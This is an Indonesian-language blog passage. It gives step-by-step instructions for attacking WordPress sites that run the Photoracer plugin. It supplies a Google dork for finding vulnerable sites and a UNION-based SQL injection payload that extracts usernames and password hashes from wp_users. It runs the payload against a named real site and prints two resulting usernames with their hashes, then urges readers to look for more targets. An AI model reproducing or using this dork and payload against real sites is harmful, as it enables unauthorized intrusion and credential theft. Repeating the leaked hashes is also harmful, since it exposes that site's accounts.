2. lalu masukan DORK/kata kunci dibawah ini
=>
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
3. pilih salah satu website wordpress lalu kita masukan
contoh site target : http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-14. Ok nah skarang
masukin EXPLOITnya dibawahini
=>
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--5.
Nah hasilnya jadi begini => http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9+from+wp_users--
envió e 9
desde :
edbong:$P$BFy9wVsbtRT4BeUtM7sOpxnMe1n11K1
admin:$P$B5OZifKi4NHils1VNfO8CspmAwZqvP0
tampilkan Username wordpress sama password salt nya ;)
Wokehh sun DUluhh cari yg laen eaaa kakak
0 komentar:
Posting Komentar